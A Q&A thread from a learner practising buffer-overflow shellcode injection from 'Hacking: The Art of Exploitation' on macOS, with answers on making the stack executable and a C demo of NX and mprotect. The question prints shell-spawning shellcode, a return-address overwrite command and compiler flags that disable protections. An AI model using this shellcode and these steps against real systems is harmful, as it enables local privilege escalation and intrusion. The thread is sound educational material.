I am currently working through "Hacking: The Art of Exploitation" and practising shellcode injection against some of the sample code I have written.
I am injecting the shellcode via an environment variable. In lldb I can see that I am overwriting the return address and that EIP gets set to the middle of my NOP sled. However, it throws "EXC_BAD_ACCESS" and segfaults.
Here is the part of the stack containing my shellcode:
0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xfffff
f90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"
Running lldb ./notesearch $(perl -e 'print "\x5e\xfc\xff\xbf"x40')
to perform the buffer overflow, this is what we get when it segfaults:
Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
frame #0: 0xbffffc5e
-> 0xbffffc5e: nop
0xbffffc5f: nop
0xbffffc60: nop
0xbffffc61: nop
I am compiling the code with
gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer
and I have set the --no-pie and --executable-heap options using the change_mach_o_flags.py script.
I think the problem is that OS X automatically makes the stack non-executable. Unfortunately, gcc on OS X does not seem to have a -z execstack option, and there is no execstack utility available either.
I have searched the web and cannot find any way to make the stack executable in my compiled code. Is there a way to do this, and if so, how?
Answer 0 (score: 5)
From the Apple developer documentation:
There are two ways to make the stack and heap executable:
Pass the -allow_stack_execute flag to the compiler. This makes the stack (not the heap) executable.
Use the mprotect system call to mark specific memory pages as executable. The details are beyond the scope of this document. For more information, see the man page for mprotect.
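As an added illustration (not code from the question, the answer, or Apple's documentation), the C program below reproduces the fault the asker is hitting and shows the mprotect route the answer points at. It maps one page, places a single ret instruction in it, and checks that calling into the page faults while it is read/write only; it then flips the page to read/execute with mprotect and checks that the same call succeeds. It assumes x86 or arm64 and a Linux or macOS toolchain; the ret byte sequences, the page setup and the two result functions are constructed for this demo.

```c
#ifdef __linux__
#define _GNU_SOURCE
#endif
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON   /* older macOS SDKs only define MAP_ANON */
#endif

/* The only bytes this demo ever executes: a bare "ret" instruction, chosen
 * per architecture. Constructed for this example. */
#if defined(__x86_64__) || defined(__i386__)
static const unsigned char ret_insn[] = { 0xc3 };
#elif defined(__aarch64__) || defined(__arm64__)
static const unsigned char ret_insn[] = { 0xc0, 0x03, 0x5f, 0xd6 };
#else
#error "this demo only knows the ret encoding for x86 and arm64"
#endif

static sigjmp_buf fault_env;
static volatile sig_atomic_t fault_seen;

/* Fault handler: record the fault and unwind back into try_execute(). */
static void on_fault(int sig) {
    (void)sig;
    fault_seen = 1;
    siglongjmp(fault_env, 1);
}

/* Attempt to run the code at `page`. Returns 1 if it executed, 0 if the CPU
 * refused (SIGSEGV on Linux; SIGBUS, shown as EXC_BAD_ACCESS in lldb, on macOS). */
static int try_execute(void *page) {
    struct sigaction sa, old_segv, old_bus;
    void (*fn)(void);

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);

    fault_seen = 0;
    if (sigsetjmp(fault_env, 1) == 0) {
        memcpy(&fn, &page, sizeof fn);  /* data pointer -> function pointer */
        fn();
    }

    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return fault_seen ? 0 : 1;
}

/* Map one RW page holding ret_insn and try to run it without ever marking it
 * executable. Returns 1 when NX refused execution, 0 when it ran, -1 on mmap
 * failure. */
int exec_refused_on_rw_page(void) {
    size_t len = (size_t)sysconf(_SC_PAGESIZE);
    void *page = mmap(NULL, len, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return -1;
    memcpy(page, ret_insn, sizeof ret_insn);
    int ran = try_execute(page);
    munmap(page, len);
    return ran ? 0 : 1;
}

/* Same page, but flipped from RW to RX with mprotect before the call, so
 * write and execute never overlap (the W^X discipline a JIT follows).
 * Returns 1 if it ran, 0 if it faulted, -1 on mmap/mprotect failure. */
int exec_allowed_after_mprotect_rx(void) {
    size_t len = (size_t)sysconf(_SC_PAGESIZE);
    void *page = mmap(NULL, len, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return -1;
    memcpy(page, ret_insn, sizeof ret_insn);
    if (mprotect(page, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(page, len);
        return -1;
    }
    /* Required on arm64 so the instruction cache sees the new bytes. */
    __builtin___clear_cache((char *)page, (char *)page + sizeof ret_insn);
    int ran = try_execute(page);
    munmap(page, len);
    return ran;
}

int main(void) {
    printf("execute from an RW page: %s\n",
           exec_refused_on_rw_page() == 1 ? "refused (NX enforced)" : "allowed");
    printf("execute after mprotect(PROT_READ|PROT_EXEC): %s\n",
           exec_allowed_after_mprotect_rx() == 1 ? "ran" : "faulted");
    return 0;
}
```

The EXC_BAD_ACCESS (code=2) at the NOP sled's address in the lldb output above is exactly this refusal: the kernel denied an instruction fetch from a page that lacks PROT_EXEC. A page that is writable and executable at different times, never both at once, is what keeps that protection meaningful, which is why the answer's second option is the one to reach for in legitimate code.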